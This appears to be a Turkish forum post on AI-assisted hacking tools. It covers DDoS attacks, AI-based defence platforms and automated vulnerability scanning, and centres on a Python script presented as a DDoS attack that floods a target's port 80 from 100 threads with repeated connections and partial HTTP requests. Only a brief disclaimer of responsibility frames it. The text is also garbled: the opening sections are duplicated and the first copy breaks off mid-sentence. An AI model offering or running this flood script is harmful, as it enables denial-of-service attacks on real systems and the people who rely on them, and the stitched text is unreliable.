Gelişen yapay zeka teknolojileri, siber güvenlik dünyasında da önemli bir yer edinmeye başladı. Hacker AI sistemleri, otomatikleştirilmiş saldırılar ve güvenlik testleri için kullanılabilir hale geldi. Bu yazıda, yapay zeka destekli hacker araçları hakkında bilgi vererek, örnek Python scriptlerinden bahsedeceğiz.
Yapay Zeka ile DDoS Saldırıları
DDoS (Distributed Denial of Service) saldırıları, hedef sistemleri aşırı trafikle devre dışı bırakmayı amaçlayan yaygın saldırılardır. Yapay zeka destekli araçlar, hedef sistemlerin savunmalarını analiz ederek daha etkili saldırılar gerçekleştirebilir.
Örnek bir Python DDoS saldırı scripti şu şekildedir:
Yapay Zeka Tabanlı Güvenlik Araçları
Bunun yanı sıra, yapay zeka tabanlı siber güvenlik sistemleri geliştirilmeye devam etmektedir. WhiteRabbit NEO (
Hacker AI ile Otomatik Zafiyet Tespiti
Yapay zeka, otomatik zafiyet tespiti ve istismar analizleri için de kullanılabilir. Özellikle Python tabanlı araçlar, güvenlik açıklarını tarayarak hedef sistemlerdeki açık noktaları otomatik olarak raporlayabilir.
Not: kötüye kullanımlarda sorumluluk bana ait değildir, konu bilgilendirme ve eğitim amaçlıdır.
Yapay Zeka ile DDoS Saldırıları
DDoS (Distributed Denial of Service) saldırıları, hedef sistemleri aşırı trafikle devre dışı bırakmayı amaçlayan yaygın saldırılardır. Yapay zeka destekli araçlar, hedef sistemlerin savunmalarını analiz ederek daha etkili saldırılar gerçekleştirebilir.
Örnek bir Python DDoS saldırı scripti şu şekildedir:
Kod:
import socket
import threading
ip = 'hedef_ip'
port = 80
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
s.send(b'GET / HTTP/1.1\r\n')
except:
s.close()
for i in range(100):
thread = threading.Thread(target=attack)
thread.start()
Yapay Zeka Tabanlı Güvenlik Araçları
Bunun yanı sıra, yapay zeka tabanlı siber güvenlik sistemleri geliştirilmeye devam etmektedir. WhiteRabbit NEO (
Ziyaretçiler için gizlenmiş link,görmek için
Giriş yap veya üye ol.
) gibi platformlar, saldırı tespiti ve savunma stratejilerinde yapay zeka kullanarak daha hızlı ve etkili sonuçlar sağlar.Hacker AI ile Otomatik Zafiyet Tespiti
Yapay zeka, otomatik zafiyet tespiti ve istismar analizleri için de kullanılabilir. Özellikle Python tabanlı araçlar, güvenlik açıklarını tarayarak hedef sistemlerdeki açık noktaları otomatik olarak raporlayabilir.
Not: kötüye kullanımlarda sorumluluk bana ait değildir, konu bilgilendirme ve eğitim amaçlıdır.